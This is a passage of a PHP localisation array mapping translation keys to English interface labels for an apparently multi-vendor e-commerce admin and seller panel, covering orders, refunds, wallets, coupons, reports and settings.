'Transection history', 'wallet_amount' => 'Wallet amount', 'credit' => 'Credit', 'debit' => 'Debit', 'my_loyalty_point' => 'My loyalty point', 'customer_wallet' => 'Customer wallet', 'add_fund' => 'Add fund', 'report' => 'Report', 'customer_loyalty_point' => 'Customer loyalty point', 'customers_settings' => 'Customers settings', 'generate_sitemap' => 'Generate sitemap', 'Before delivered you need to make payment status paid!' => 'Before delivered you need to make payment status paid!', 'view_website' => 'View website', 'Order_list' => 'Order list', 'refund_management' => 'Refund management', 'POS_Orders' => 'POS Orders', 'export' => 'Export', 'Business_Setup' => 'Business Setup', 'System Settings' => 'System Settings', '3rd_party' => '3rd party', 'order_settings' => 'Order settings', 'product_code_sku' => 'Product code sku', 'generate' => 'Generate', 'code' => 'Code', 'minimum_order_quantity' => 'Minimum order quantity', 'Sorry the minimum order quantity does not match' => 'Sorry the minimum order quantity does not match', 'minimum_order_quantity_cannot_be_less_than_' => 'Minimum order quantity cannot be less than ', 'Setup' => 'Setup', 'reset' => 'Reset', 'product_setting' => 'Product setting', 'Total Product' => 'Total Product', 'Total Order' => 'Total Order', 'category_list' => 'Category list', 'Category_Name' => 'Category Name', 'Set_Priority' => 'Set Priority', 'Category_Logo' => 'Category Logo', 'refund_requests' => 'Refund requests', 'business_analytics' => 'Business analytics', 'Packaging' => 'Packaging', 'failed to delivery' => 'Failed to delivery', 'earning_statistics' => 'Earning statistics', 'most_popular_products' => 'Most popular products', 'Refund_Requests' => 'Refund Requests', 'Category_Setup' => 'Category Setup', 'Categories' => 'Categories', 'Sub_Categories' => 'Sub Categories', 'Sub_Sub_Categories' => 'Sub Sub Categories', 'Product_Attributes' => 'Product Attributes', 'promotion_management' => 'Promotion management', 'Offers_&_Deals' => 'Offers & Deals', 'Flash_Deals' => 'Flash Deals', 'Featured_Deal' => 'Featured Deal', 'Push_Notification' => 'Push Notification', 'announcement' => 'Announcement', 'help_&_support_section' => 'Help & support section', 'Support_Ticket' => 'Support Ticket', 'Reports' => 'Reports', 'Analysis' => 'Analysis', 'Sales_&_Transaction_Report' => 'Sales & Transaction Report', 'Statistics' => 'Statistics', 'Order_Transactions' => 'Order Transactions', 'Refund_Transactions' => 'Refund Transactions', 'Product_Report' => 'Product Report', 'Wishlisted_Products' => 'Wishlisted Products', 'user_management' => 'User management', 'Customer_List' => 'Customer List', 'wallet' => 'Wallet', 'Loyalty_Points' => 'Loyalty Points', 'Add_New_Seller' => 'Add New Seller', 'Seller_List' => 'Seller List', 'subscribers' => 'Subscribers', 'Employee_Role_Setup' => 'Employee Role Setup', 'Employees' => 'Employees', 'System_Settings' => 'System Settings', 'Pages_&_Media' => 'Pages & Media', 'pages' => 'Pages', 'Social_Media_Links' => 'Social Media Links', 'System_Setup' => 'System Setup', 'Business Setup' => 'Business Setup', 'Profile' => 'Profile', 'shop_banner' => 'Shop banner', 'shop_logo' => 'Shop logo', 'Search Ticket by Subject or status...' => 'Search Ticket by Subject or status...', 'packaging' => 'Packaging', 'Out_For_Delivery' => 'Out For Delivery', 'Failed_To_Delivery' => 'Failed To Delivery', 'Seller_Wallet' => 'Seller Wallet', 'Pending_Withdraw' => 'Pending Withdraw', 'Total_Commission_given' => 'Total Commission given', 'Aready_Withdrawn' => 'Aready Withdrawn', 'total_delivery_charge_earned' => 'Total delivery charge earned', 'total_tax_given' => 'Total tax given', 'Earning_statistics' => 'Earning statistics', 'This_Year' => 'This Year', 'This_Month' => 'This Month', 'This Week' => 'This Week', 'Top_selling_products' => 'Top selling products', 'OK' => 'OK', 'Product_Section' => 'Product Section', 'Search by Name' => 'Search by Name', 'Billing_Section' => 'Billing Section', 'Paid By' => 'Paid By', 'Card' => 'Card', 'Cancel_order' => 'Cancel order', 'place_Order' => 'Place Order', 'apply' => 'Apply', 'Product already added in cart' => 'Product already added in cart', 'Sorry product out of stock' => 'Sorry product out of stock', 'Item has been added in your cart!' => 'Item has been added in your cart!', 'Please choose all the options' => 'Please choose all the options', 'range' => 'Range', 'show' => 'Show', 'failed-to-deliver' => 'Failed-to-deliver', 'search_orders' => 'Search orders', 'Excel' => 'Excel', 'Order_ID' => 'Order ID', 'Order_Date' => 'Order Date', 'Total_amount' => 'Total amount', 'Order_Status' => 'Order Status', 'Limited_Stocks' => 'Limited Stocks', 'Product Type' => 'Product Type', 'barcode' => 'Barcode', 'Add_new_product' => 'Add new product', 'product_type' => 'Product type', 'physical' => 'Physical', 'digital' => 'Digital', 'digital_product_type' => 'Digital product type', 'Ready After Sell' => 'Ready After Sell', 'Ready Product' => 'Ready Product', 'ready_product_upload' => 'Ready product upload', 'Product_reviews' => 'Product reviews', 'select_product' => 'Select product', 'select_customer' => 'Select customer', 'customer_removed' => 'Customer removed', 'Chatting_List' => 'Chatting List', 'Search_customers...' => 'Search customers...', 'Send_Reply' => 'Send Reply', 'bulk_Import' => 'Bulk Import', 'You can upload your product images in product folder from gallery and copy image`s path' => 'You can upload your product images in product folder from gallery and copy image`s path', 'Bank Information' => 'Bank Information', 'Holder_Name' => 'Holder Name', 'Bank_Name' => 'Bank Name', 'Branch_Name' => 'Branch Name', 'Account_Number' => 'Account Number', 'Edit_Bank_info' => 'Edit Bank info', 'Edit_Bank_Info' => 'Edit Bank Info', 'Shop_Info' => 'Shop Info', 'add_new_deliveryman' => 'Add new deliveryman', 'Ex : 017********' => 'Ex : 017********', 'Ex : ex@example.com' => 'Ex : ex@example.com', 'Ex : password' => 'Ex : password', 'Profile_Image' => 'Profile Image', 'Upload_image' => 'Upload image', 'choose_file' => 'Choose file', 'Duration' => 'Duration', 'End Date' => 'End Date', 'expired' => 'Expired', 'active_products' => 'Active products', 'publish' => 'Publish', 'Start Date' => 'Start Date', 'Terms_&_Conditions' => 'Terms & Conditions', 'Privacy_Policy' => 'Privacy Policy', 'About_Us' => 'About Us', 'withdraw' => 'Withdraw', 'action_disabled' => 'Action disabled', 'Order_Report' => 'Order Report', 'Total orders of' => 'Total orders of', 'product_stock' => 'Product stock', 'Sort' => 'Sort', 'wishlist_sort_by_(low_to_high)' => 'Wishlist sort by (low to high)', 'wishlist_sort_by_(high_to_low)' => 'Wishlist sort by (high to low)', 'Export' => 'Export', 'excel' => 'Excel', 'product_in_wishlist' => 'Product in wishlist', 'coupon_setup' => 'Coupon setup', 'Select Coupon Type' => 'Select Coupon Type', 'coupon_title' => 'Coupon title', 'generate_code' => 'Generate code', 'percentage (%)' => 'Percentage (%)', 'Discount_Amount' => 'Discount Amount', 'Ex: 500' => 'Ex: 500', 'minimum_purchase ($)' => 'Minimum purchase ($)', 'Ex: 100' => 'Ex: 100', 'maximum_discount ($)' => 'Maximum discount ($)', 'Ex: 5000' => 'Ex: 5000', 'coupon_list' => 'Coupon list', 'user_limit' => 'User limit', 'Limit' => 'Limit', 'Used' => 'Used', 'delivery_restriction' => 'Delivery restriction', 'general' => 'General', 'In-House_Shop' => 'In-House Shop', 'Refund' => 'Refund', 'Shipping_Method' => 'Shipping Method', 'delivery_to_country' => 'Delivery to country', 'country_name' => 'Country name', 'delivery_to_zip_code_area' => 'Delivery to zip code area', 'zip' => 'Zip', 'enter_zip_code' => 'Enter zip code', 'Failed_to_Deliver' => 'Failed to Deliver', 'sign_up' => 'Sign up', 'Search here ...' => 'Search here ...', 'Expand Menu' => 'Expand Menu', 'chat_with_delivery-man' => 'Chat with delivery-man', 'tax_fee' => 'Tax fee', 'Write your message here...' => 'Write your message here...', 'sign_in_with_google' => 'Sign in with google', 'sign_in_with_facebook' => 'Sign in with facebook', 'Online Shopping' => 'Online Shopping', 'Payment Status' => 'Payment Status', 'Item Details' => 'Item Details', 'Qty' => 'Qty', 'Order_&_Shipping_Info ' => 'Order & Shipping Info ', 'Order Status' => 'Order Status', 'Payment_Status' => 'Payment Status', 'deliveryman_will_get' => 'Deliveryman will get', 'expected_delivery_date' => 'Expected delivery date', 'Customer_information' => 'Customer information', 'Shop_Information' => 'Shop Information', 'Orders Served' => 'Orders Served', 'Account has been deleted you can not change the status!' => 'Account has been deleted you can not change the status!', 'Chat' => 'Chat', 'emergency_contact' => 'Emergency contact', 'Emergency_Contact' => 'Emergency Contact', 'Order_Details' => 'Order Details', 'Reference' => 'Reference', 'Item_Details' => 'Item Details', 'uploaded_file' => 'Uploaded file', 'failed_to_deliver' => 'Failed to deliver', 'Delivery_man' => 'Delivery man', 'Failed To Deliver' => 'Failed To Deliver', 'Refund_Request_List' => 'Refund Request List', 'Help_&_Support_Section' => 'Help & Support Section', 'Delivery-Man' => 'Delivery-Man', 'My_Bank_Info' => 'My Bank Info', 'My_Shop' => 'My Shop', 'Support Ticket Answer' => 'Support Ticket Answer', 'Order No' => 'Order No', 'Coupon Discount' => 'Coupon Discount', 'My Order' => 'My Order', 'Estimated Delivary Date' => 'Estimated Delivary Date', 'First step' => 'First step', 'Order placed' => 'Order placed', 'Second step' => 'Second step', 'Packaging order' => 'Packaging order', 'Third step' => 'Third step', 'Preparing Shipment' => 'Preparing Shipment', 'Fourth step' => 'Fourth step', 'Order Shipped' => 'Order Shipped', 'View Order Details' => 'View Order Details', 'Image ratio should be 1:1' => 'Image ratio should be 1:1', 'want_to_delete_this_account ' => 'Want to delete this account ', 'delete_account' => 'Delete account', 'My Loyalty Point' => 'My Loyalty Point', 'loyalty_point_history' => 'Loyalty point history', 'total_loyalty_point' => 'Total loyalty point', 'convert_to_currency' => 'Convert to currency', 'your loyalty point will convert to currency and transfer to your wallet' => 'Your loyalty point will convert to currency and transfer to your wallet', 'minimum point for convert to currency is :' => 'Minimum point for convert to currency is :', 'point' => 'Point', 'edit_address' => 'Edit address', 'Addresses' => 'Addresses', 'i_agree_to_Your' => 'I agree to Your', 'sign_up_with_google' => 'Sign up with google', 'sign_up_with_facebook' => 'Sign up with facebook', 'Earning_Reports' => 'Earning Reports', 'Admin_Earning' => 'Admin Earning', 'Seller_Earning' => 'Seller Earning', 'Total Sales' => 'Total Sales', 'Search by sores' => 'Search by sores', 'Seller Info' => 'Seller Info', 'Earn From Order' => 'Earn From Order', 'Earn From Shipping' => 'Earn From Shipping', 'Discount Given' => 'Discount Given', 'Tax Given' => 'Tax Given', 'Total Earning' => 'Total Earning', 'Withdrawable Balance' => 'Withdrawable Balance', 'Do_you_want_to_logout' => 'Do you want to logout', 'reports' => 'Reports', 'Transaction_Report' => 'Transaction Report', 'Environment_Setup' => 'Environment Setup', 'Generate_Site_Map' => 'Generate Site Map', 'Analytic_Script' => 'Analytic Script', 'Currency_Setup' => 'Currency Setup', 'Languages' => 'Languages', 'Clean_Database' => 'Clean Database', 'Environment_Information' => 'Environment Information', 'status_updated_successfully' => 'Status updated successfully', 'Select Logout below if you are ready to end your current session' => 'Select Logout below if you are ready to end your current session', 'We are sorry the page you requested could not be found' => 'We are sorry the page you requested could not be found', 'Sorry stock limit exceeded' => 'Sorry stock limit exceeded', 'In-house' => 'In-house', 'EX of SMS provider s template : your OTP is XXXX here please check' => 'EX of SMS provider s template : your OTP is XXXX here please check', 'Yes delete it' => 'Yes delete it', 'auto_translate' => 'Auto translate', 'refund_policy' => 'Refund policy', 'return_policy' => 'Return policy', 'cancellation_policy' => 'Cancellation policy', 'Sorry the minimum order quantity does not match' => 'Sorry the minimum order quantity does not match', 'Total Stores' => 'Total Stores', 'Total Products' => 'Total Products', 'Total Customers' => 'Total Customers', 'Most_Popular_Stores' => 'Most Popular Stores', 'Top_Delivery_Man' => 'Top Delivery Man', 'Key translated successfully' => 'Key translated successfully', 'translate' => 'Translate', 'general_settings' => 'General settings', 'App_Settings' => 'App Settings', 'refund' => 'Refund', 'By_turning_on_maintaince_mode _all_your_app_and_customer_side_website_will_be_off._Only_admin_panel_and_seller_panel_will_be_functional' => 'By turning on maintaince mode all your app and customer side website will be off. Only admin panel and seller panel will be functional', 'Company_Information' => 'Company Information', 'company_address' => 'Company address', 'business_Information' => 'Business Information', 'Position' => 'Position', 'Company_Copyright_Text' => 'Company Copyright Text', 'Website Color' => 'Website Color', 'Primary_Color' => 'Primary Color', 'Secondary Color' => 'Secondary Color', 'Website Header Logo' => 'Website Header Logo', 'Website_Footer_Logo' => 'Website Footer Logo', 'Website Favicon' => 'Website Favicon', 'Loading Gif' => 'Loading Gif', 'App_Logo' => 'App Logo', 'Cancel_Order' => 'Cancel Order', 'Place_Order' => 'Place Order', 'Sorry product is out of stock.' => 'Sorry product is out of stock.', 'Earning_Report' => 'Earning Report', 'sort_by_(low_to_high)' => 'Sort by (low to high)', 'sort_by_(high_to_low)' => 'Sort by (high to low)', 'customer added successfully' => 'Customer added successfully', 'No Account' => 'No Account', 'Already_Withdrawn' => 'Already Withdrawn', 'Add_New' => 'Add New', 'You have new order Check Please' => 'You have new order Check Please', 'Ok let me check' => 'Ok let me check', 'Search Data' => 'Search Data', 'This Year' => 'This Year', 'This Month' => 'This Month', 'Custom Date' => 'Custom Date', 'Total Earnings' => 'Total Earnings', 'Total In-House Products' => 'Total In-House Products', 'Earning Statistics' => 'Earning Statistics', 'Payment Statistics' => 'Payment Statistics', 'Payments Amount' => 'Payments Amount', 'Cash Payments' => 'Cash Payments', 'Digital Payments' => 'Digital Payments', 'Wallet Payments' => 'Wallet Payments', 'In-House Earning' => 'In-House Earning', 'Commission Earning' => 'Commission Earning', 'VAT/TAX' => 'VAT/TAX', 'Refund Given' => 'Refund Given', 'Cash Payments ' => 'Cash Payments ', 'search_menu' => 'Search menu', ' Ecommerce' => ' Ecommerce', 'wishlist' => 'Wishlist', 'wallet_payment' => 'Wallet payment', 'your_current_balance' => 'Your current balance', 'remaining_balance' => 'Remaining balance', 'you do not have sufficient balance for pay this order!!' => 'You do not have sufficient balance for pay this order!!', 'If you need help or you have any other questions feel free to email us' => 'If you need help or you have any other questions feel free to email us', 'In_House' => 'In House', 'Start_Date' => 'Start Date', 'End_Date' => 'End Date', 'Search by Order ID' => 'Search by Order ID', 'Order_&_Shipping_Info' => 'Order & Shipping Info', 'order wise' => 'Order wise', 'order wise seller shipping' => 'Order wise seller shipping', 'Yes Change it' => 'Yes Change it', 'Account has been deleted you can not change the status!' => 'Account has been deleted you can not change the status!', 'Order is already delivered You can not change it' => 'Order is already delivered You can not change it', 'order wise shipping' => 'Order wise shipping', 'product wise' => 'Product wise', 'Order is already delivered and transaction amount has been disbursed changing status can be the reason of miscalculation' => 'Order is already delivered and transaction amount has been disbursed changing status can be the reason of miscalculation', 'Fill_all_required_fields_of_billing_address' => 'Fill all required fields of billing address', 'Download' => 'Download', 'Product_not_uploaded_yet' => 'Product not uploaded yet', 'File' => 'File', 'File type: jpg jpeg png gif zip pdf' => 'File type: jpg jpeg png gif zip pdf', 'Product Report' => 'Product Report', 'product_report' => 'Product report', 'All_Products' => 'All Products', 'Out_of_Stock_Products' => 'Out of Stock Products', 'Wish_Listed_Products' => 'Wish Listed Products', 'Product Unit Price' => 'Product Unit Price', 'Total Amount Sold' => 'Total Amount Sold', 'Total Discount Given' => 'Total Discount Given', 'Average Product Value' => 'Average Product Value', 'Current Stock Amount' => 'Current Stock Amount', 'Average Ratings' => 'Average Ratings', 'Last Updated Stock' => 'Last Updated Stock', 'In-House_Product_List' => 'In-House Product List', 'Limited Sotcks' => 'Limited Sotcks', 'Add_New_Product' => 'Add New Product', 'Show_as_featured' => 'Show as featured', 'Discount_Type' => 'Discount Type', 'optional please provide embed link not direct link' => 'Optional please provide embed link not direct link', 'Want to add this product' => 'Want to add this product', 'seller_list' => 'Seller list', 'contact_info' => 'Contact info', 'total_products' => 'Total products', 'total_orders' => 'Total orders', 'In-Active' => 'In-Active', 'No Data found' => 'No Data found', 'Total Seller' => 'Total Seller', 'Total Seller Products' => 'Total Seller Products', 'Rejected' => 'Rejected', 'Pending Request' => 'Pending Request', 'Active Product' => 'Active Product', 'Seller Wallet Status' => 'Seller Wallet Status', 'Wallet Amount' => 'Wallet Amount', 'Withdrawble Balance' => 'Withdrawble Balance', 'Pending Withdraws' => 'Pending Withdraws', 'Already Withdrawn' => 'Already Withdrawn', 'cash on delivery' => 'Cash on delivery', 'admin_bearer' => 'Admin bearer', 'Failed_to_deliver' => 'Failed to deliver', 'Yes Change it!' => 'Yes Change it!', 'Order is already delivered You can not change it !!' => 'Order is already delivered You can not change it !!', 'Select_coupon_type' => 'Select coupon type', 'Free_Delivery' => 'Free Delivery', 'First_Order' => 'First Order', 'coupon_bearer' => 'Coupon bearer', 'Select_coupon_bearer' => 'Select coupon bearer', 'admin' => 'Admin', 'select_seller' => 'Select seller', 'Select_customer' => 'Select customer', 'all_customer' => 'All customer', 'discount_bearer' => 'Discount bearer', 'discount on purchase' => 'Discount on purchase', 'free delivery' => 'Free delivery', 'first order' => 'First order', 'coupon_update' => 'Coupon update', 'all_seller' => 'All seller', 'coupon_bearer_is_required!' => 'Coupon bearer is required!', 'select_seller_is_required!' => 'Select seller is required!', 'select_customer_is_required!' => 'Select customer is required!', 'limit_for_same_user_is_required!' => 'Limit for same user is required!', 'discount_type_is_required!' => 'Discount type is required!', 'discount_amount_is_required!' => 'Discount amount is required!', 'minimum_purchase_is_required!' => 'Minimum purchase is required!', 'Admin_Earning_Report' => 'Admin Earning Report', 'In-House_earning' => 'In-House earning', 'shipping_earn' => 'Shipping earn', 'discount_given' => 'Discount given', 'refund_given' => 'Refund given', 'All_copy_right_reserved_©_2023_' => 'All copy right reserved © 2023 ', 'Search_Data' => 'Search Data', 'This_Week' => 'This Week', 'Custom_Date' => 'Custom Date', 'Tax Collected' => 'Tax Collected', 'Seller_Info' => 'Seller Info', 'Earn_From_Order' => 'Earn From Order', 'Earn_From_Shipping' => 'Earn From Shipping', 'Commission_Given' => 'Commission Given', 'Discount_Given' => 'Discount Given', 'Tax_Collected' => 'Tax Collected', 'Refund_Given' => 'Refund Given', 'Total_Earning' => 'Total Earning', 'Total_Seller' => 'Total Seller', 'Total_Seller_Products' => 'Total Seller Products', 'Earning_Statistics' => 'Earning Statistics', 'Average_Earning_Value' => 'Average Earning Value', 'inhouse_sale' => 'Inhouse sale', 'Are you sure delete this ' => 'Are you sure delete this ', 'delete it' => 'Delete it', 'identity_image' => 'Identity image', 'password_minimum_8_characters' => 'Password minimum 8 characters', 'Contact_Info' => 'Contact Info', 'Total_Orders' => 'Total Orders', 'Seller Reports' => 'Seller Reports', 'Completion Rate' => 'Completion Rate', 'Refund Rate' => 'Refund Rate', 'transaction_report' => 'Transaction report', 'Expense_Transactions' => 'Expense Transactions', 'Select Seller' => 'Select Seller', 'Select Customer' => 'Select Customer', 'Select Time Period' => 'Select Time Period', 'Total Orders' => 'Total Orders', 'In-House Orders' => 'In-House Orders', 'Seller Orders' => 'Seller Orders', 'Order Statistics' => 'Order Statistics', 'Total Transactions' => 'Total Transactions', 'Download PDF' => 'Download PDF', 'total_product_amount' => 'Total product amount', 'product_discount' => 'Product discount', 'discounted_amount' => 'Discounted amount', 'admin_discount' => 'Admin discount', 'seller_discount' => 'Seller discount', 'admin_net_income' => 'Admin net income', 'seller_net_income' => 'Seller net income', 'test' => 'Test', 'Oder_Transaction_Statement' => 'Oder Transaction Statement', 'Customer_Info' => 'Customer Info', 'Payment_Method' => 'Payment Method', 'latest' => 'Latest', 'featured deal' => 'Featured deal', 'Delivered_By' => 'Delivered By', 'delivery_man' => 'Delivery man', 'additional' => 'Additional', 'Total_Order' => 'Total Order', 'In-House_Order' => 'In-House Order', 'Seller_Order' => 'Seller Order', 'Total_In-House_Products' => 'Total In-House Products', 'Total_Stores' => 'Total Stores', 'total_ordered_product_price' => 'Total ordered product price', 'total_product_discount' => 'Total product discount', 'total_coupon_discount' => 'Total coupon discount', 'total_discounted_amount' => 'Total discounted amount', 'total_delivery_charge' => 'Total delivery charge', 'total_order_amount' => 'Total order amount', 'total_order' => 'Total order', 'cash_payment' => 'Cash payment', 'In-House Products' => 'In-House Products', 'Seller Products' => 'Seller Products', 'completed_payments' => 'Completed payments', 'cash_payments' => 'Cash payments', 'digital_payments' => 'Digital payments', 'completed' => 'Completed', 'payments' => 'Payments', 'Total Expense' => 'Total Expense', 'Free Delivery' => 'Free Delivery', 'In-House Product Discount' => 'In-House Product Discount', 'Transaction Statistics' => 'Transaction Statistics', 'Search by ID...' => 'Search by ID...', 'XID' => 'XID', 'Transaction Date' => 'Transaction Date', 'Expense Amount' => 'Expense Amount', 'Expense Type' => 'Expense Type', 'refund_transactions' => 'Refund transactions', 'this_year' => 'This year', 'this_month' => 'This month', 'this_week' => 'This week', 'custom_date' => 'Custom date', 'search_data' => 'Search data', 'transaction_date' => 'Transaction date', 'expense_type' => 'Expense type', 'expense_amount' => 'Expense amount', 'total_expense' => 'Total expense', 'total_expense_transactions' => 'Total expense transactions', 'category wise' => 'Category wise', 'test 1' => 'Test 1', 'total_expense_amount' => 'Total expense amount', 'free_delivery_amount' => 'Free delivery amount', 'coupon_discount_amount' => 'Coupon discount amount', 'free_delivery_on_coupon_discount' => 'Free delivery on coupon discount', 'Total_Expense' => 'Total Expense', 'Free_Delivery_on_Coupon_Discount' => 'Free Delivery on Coupon Discount', 'Coupon_Discount' => 'Coupon Discount', 'customer wallet' => 'Customer wallet', 'digitally paid' => 'Digitally paid', 'Free_Delivery_Coupon' => 'Free Delivery Coupon', 'paypal' => 'Paypal', 'Total Amount' => 'Total Amount', 'Product Discount' => 'Product Discount', 'Shipping Charge' => 'Shipping Charge', 'filter_data' => 'Filter data', 'reund_requests' => 'Reund requests', 'Pending_Refund_Requests' => 'Pending Refund Requests', 'product_info' => 'Product info', 'total_amount' => 'Total amount', 'it is already refunded you can not change it!!' => 'It is already refunded you can not change it!!', 'filter Data' => 'Filter Data', 'Filter_Data' => 'Filter Data', 'Total_Earnings' => 'Total Earnings', 'all_sellers' => 'All sellers', 'active_sellers' => 'Active sellers', 'online_seller' => 'Online seller', 'offline_seller' => 'Offline seller', 'banned_seller' => 'Banned seller', 'Delivery_Restriction' => 'Delivery Restriction', 'delivery_available_country' => 'Delivery available country', 'delivery_available_zip_code_area' => 'Delivery available zip code area', 'multiple_zip_codes_can_be_inputted_by_comma_separating_or_pressing_enter_button' => 'Multiple zip codes can be inputted by comma separating or pressing enter button', 'customer_settings' => 'Customer settings', 'customer_wallet_settings' => 'Customer wallet settings', 'refund_to_wallet' => 'Refund to wallet', 'refund_to_wallet_hint' => 'Refund to wallet hint', 'show_hide_food_menu' => 'Show hide food menu', 'loyalty_point' => 'Loyalty point', 'how_much_point' => 'How much point', 'percentage_of_loyalty_point_on_order_amount' => 'Percentage of loyalty point on order amount', 'minimum_point_to_transfer' => 'Minimum point to transfer', 'Customer_list' => 'Customer list', 'want_to_change_status' => 'Want to change status', 'SMS_Config' => 'SMS Config', 'Mail_Config' => 'Mail Config', 'Payment_Methods' => 'Payment Methods', 'Recaptcha' => 'Recaptcha', 'Google_Map_APIs' => 'Google Map APIs', 'Push_Notification_Setup' => 'Push Notification Setup', 'Social_Media_Login' => 'Social Media Login', 'NB_:_#OTP#_will_be_replace_with_otp' => 'NB : #OTP# will be replace with otp', 'Google_Recapcha_Information' => 'Google Recapcha Information', 'Credentials_SetUp_page' => 'Credentials SetUp page', 'To get site key and secret keyGo to the Credentials page' => 'To get site key and secret keyGo to the Credentials page', 'Click_here' => 'Click here', 'Add_a _abel_(Ex:_abc_company)' => 'Add a abel (Ex: abc company)', 'Select_reCAPTCHA_v2_as_ReCAPTCHA_Type' => 'Select reCAPTCHA v2 as ReCAPTCHA Type', 'select_sub_type' => 'Select sub type', 'im_not_a_robot_checkbox ' => 'Im not a robot checkbox ', 'Add_Domain_(For_ex:_demo.6amtech.com)' => 'Add Domain (For ex: demo.6amtech.com)', 'Check_in_“Accept_the_reCAPTCHA_Terms_of_Service”' => 'Check in “Accept the reCAPTCHA Terms of Service”', 'Press_Submit' => 'Press Submit', 'Copy_Site_Key_and_Secret_Key _Paste_in_the_input_filed_below_and_Save.' => 'Copy Site Key and Secret Key Paste in the input filed below and Save.', 'ongoing' => 'Ongoing', 'Total_Deliveryman' => 'Total Deliveryman', 'Total_Store_Earnings' => 'Total Store Earnings', 'Product has been added to wishlist' => 'Product has been added to wishlist', 'app_settings' => 'App settings', 'Total_Sales' => 'Total Sales', 'Product_Name' => 'Product Name', 'Product_Unit_Price' => 'Product Unit Price', 'Total_Amount_Sold' => 'Total Amount Sold', 'Total_Discount_Given' => 'Total Discount Given', 'Average_Product_Value' => 'Average Product Value', 'Current_Stock_Amount' => 'Current Stock Amount', 'Average_Ratings' => 'Average Ratings', 'total_product' => 'Total product', 'Sales_Statistics' => 'Sales Statistics', 'Average_Sales_Value' => 'Average Sales Value', 'Total_Product_Sale' => 'Total Product Sale', 'Total_Product' => 'Total Product', 'Seller_Product_List' => 'Seller Product List', 'Top_5_Product_Wise_Sale' => 'Top 5 Product Wise Sale', 'All_Priority' => 'All Priority', 'All_Status' => 'All Status', 'Open' => 'Open', 'low' => 'Low', 'Website Problem' => 'Website Problem', 'Info inquiry' => 'Info inquiry', 'Sub' => 'Sub', 'Select_main_category' => 'Select main category', 'sub_sub_category_list' => 'Sub sub category list', 'select_category' => 'Select category', 'Total_Sale' => 'Total Sale', 'Search_by_Name' => 'Search by Name', 'Brand_Logo' => 'Brand Logo', 'Download the format file and fill it with proper data.' => 'Download the format file and fill it with proper data.', 'You can download the example file to understand how the data must be filled.' => 'You can download the example file to understand how the data must be filled.', 'Once you have downloaded and filled the format file' => 'Once you have downloaded and filled the format file', 'upload it in the form below and submit.' => 'Upload it in the form below and submit.', 'After uploading products you need to edit them and set product images and choices.' => 'After uploading products you need to edit them and set product images and choices.', 'You can get brand and category id from their list' => 'You can get brand and category id from their list', 'please input the right ids.' => 'Please input the right ids.', 'You can upload your product images in product folder from gallery' => 'You can upload your product images in product folder from gallery', 'and copy image`s path.' => 'And copy image`s path.', 'Don`t_have_the_template_ ' => 'Don`t have the template ', 'download_here' => 'Download here', 'Deal Of The Day' => 'Deal Of The Day', 'Select Product' => 'Select Product', 'Limited_Stocked_Products_List' => 'Limited Stocked Products List', 'Purchese price' => 'Purchese price', 'Current_Stock' => 'Current Stock', 'In-Stock' => 'In-Stock', 'Out_of_Stock' => 'Out of Stock', 'search_by_order_id' => 'Search by order id', 'Filter_Report' => 'Filter Report', 'No_data_to_found' => 'No data to found', '' => '', 'Due_Amount' => 'Due Amount', 'Already_Settled' => 'Already Settled', 'Total_Order_Amount' => 'Total Order Amount', 'Order_Statistics' => 'Order Statistics', 'Payment_Statistics' => 'Payment Statistics', 'Cash_Payments' => 'Cash Payments', 'Digital_Payments' => 'Digital Payments', 'Products_Stock' => 'Products Stock', 'Product_Stock' => 'Product Stock', 'Active_Products' => 'Active Products', 'Inactive_Products' => 'Inactive Products', 'Pending_Products' => 'Pending Products', 'available' => 'Available', 'Attribute_Setup' => 'Attribute Setup', 'Attribute_Name' => 'Attribute Name', 'not_available' => 'Not available', 'Completed_Orders' => 'Completed Orders', 'Ongoing_Orders' => 'Ongoing Orders', 'Canceled_Orders' => 'Canceled Orders', 'order_ID' => 'Order ID', 'Expense_Transaction_Statement' => 'Expense Transaction Statement', 'stock_sort_by_(low_to_high)' => 'Stock sort by (low to high)', 'stock_sort_by_(high_to_low)' => 'Stock sort by (high to low)', 'software_update' => 'Software update', 'admin wallets' => 'Admin wallets', 'admin wallet histori...' => 'Admin wallet histori...', 'attributes' => 'Attributes', 'billing addresses' => 'Billing addresses', 'carts' => 'Carts', 'cart shippings' => 'Cart shippings', 'category shipping co...' => 'Category shipping co...', 'chattings' => 'Chattings', 'contacts' => 'Contacts', 'customer wallets' => 'Customer wallets', 'customer wallet hist...' => 'Customer wallet hist...', 'deal of the days' => 'Deal of the days', 'deliveryman notifica...' => 'Deliveryman notifica...', 'deliveryman wallets' => 'Deliveryman wallets', 'delivery country cod...' => 'Delivery country cod...', 'delivery histories' => 'Delivery histories', 'delivery man transac...' => 'Delivery man transac...', 'delivery men' => 'Delivery men', 'delivery zip codes' => 'Delivery zip codes', 'emergency contacts' => 'Emergency contacts', 'feature deals' => 'Feature deals', 'flash deal products' => 'Flash deal products', 'help topics' => 'Help topics', 'jobs' => 'Jobs', 'loyalty point transa...' => 'Loyalty point transa...', 'notifications' => 'Notifications', 'order details' => 'Order details', 'order expected deliv...' => 'Order expected deliv...', 'order status histori...' => 'Order status histori...', 'order transactions' => 'Order transactions', 'paytabs invoices' => 'Paytabs invoices', 'product stocks' => 'Product stocks', 'refund requests' => 'Refund requests', 'refund statuses' => 'Refund statuses', 'refund transactions' => 'Refund transactions', 'search functions' => 'Search functions', 'seller wallets' => 'Seller wallets', 'seller wallet histor...' => 'Seller wallet histor...', 'shipping addresses' => 'Shipping addresses', 'shipping methods' => 'Shipping methods', 'shipping types' => 'Shipping types', 'shops' => 'Shops', 'subscriptions' => 'Subscriptions', 'support tickets' => 'Support tickets', 'support ticket convs' => 'Support ticket convs', 'transactions' => 'Transactions', 'translations' => 'Translations', 'wallet transactions' => 'Wallet transactions', 'wishlists' => 'Wishlists', 'withdraw requests' => 'Withdraw requests', 'updated_files' => 'Updated files', 'updated_file' => 'Updated file', 'upload_the_updated_file' => 'Upload the updated file', 'We are sorry, the page you requested could not be found' => 'We are sorry the page you requested could not be found', 'activate_maintenance_mode' => 'Activate maintenance mode', 'maintenance_mode_activated_for_others_you_can_update_now' => 'Maintenance mode activated for others you can update now', 'codecanyon_username' => 'Codecanyon username', 'purchase_code' => 'Purchase code', 'Brand_Name' => 'Brand Name', 'choose_updated_file' => 'Choose updated file', 'upload_&_update' => 'Upload & update', 'Tax_Model' => 'Tax Model', 'include' => 'Include', 'exclude' => 'Exclude', 'tags' => 'Tags', 'search_tags' => 'Search tags', 'discounted' => 'Discounted', 'all_status' => 'All status', 'shipping_charge' => 'Shipping charge', 'seller_information' => 'Seller information', 'Seller_Image' => 'Seller Image', 